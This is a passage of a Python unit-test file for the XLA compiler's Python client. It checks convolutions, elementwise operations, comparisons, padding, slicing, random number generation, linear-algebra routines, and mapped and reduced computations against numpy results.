[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[2, 1], xla_client.PaddingType.VALID)
result = np.array([[[[640., 700., 760.],
[1120., 1180., 1240.]]]])
self._ExecuteAndCompareClose(c, expected=result)
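# ConvWithGeneralPadding exposes the full convolution configuration:
# per-spatial-dimension strides, (low, high) padding pairs, lhs_dilation
# (input dilation, which yields transposed/fractionally-strided
# convolutions), and rhs_dilation (kernel/atrous dilation).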
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(c.Constant(np.transpose(lhs, (0, 2, 3, 1))),
c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
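# feature_group_count splits the input feature dimension into that many
# groups, each convolved with its own slice of the filters. With 2 input
# channels and feature_group_count=2 this is effectively a depthwise
# convolution, so rhs has shape (out=2, in_per_group=1, kh=1, kw=2).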
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]],
[[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
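# For floats, Ne follows IEEE 754: NaN compares unequal to everything,
# including itself, while 0.0 and -0.0 compare equal.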
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
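# Pad takes one (edge_padding_low, edge_padding_high, interior_padding)
# triple per dimension, with interior padding inserted *between*
# elements. For dim 0 below, (1, 2, 1) applied to 2 rows yields
# 1 + 1 + 1 + 1 + 2 = 6 output rows (low + row + interior + row + high).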
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
[(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.xla_data_pb2.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = padding_config.dimensions.add()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
padding_config)
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
# TODO(b/72689392): re-enable when the S32 bug is resolved.
def DISABLED_testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = c.Build().Compile().ExecuteWithPythonValues()
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
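# TriangularSolve with left_side=False solves x @ op(a) = b for x, where
# transpose_a=True makes op(a) = a.T and lower=True declares a to be
# lower triangular (only that triangle is read).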
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(c.Constant(a_vals), c.Constant(b_vals), left_side=False,
lower=True, transpose_a=True)
self._ExecuteAndCompareClose(c, expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
], dtype=np.float32), rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
class EmbeddedComputationsTest(LocalComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_ge_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_ge_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
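# Reduce folds the operand along the given dimensions with the supplied
# binary computation, seeded by init_value; with addition and init 0
# this matches np.sum over the same axes, as the 3-D tests verify.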
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
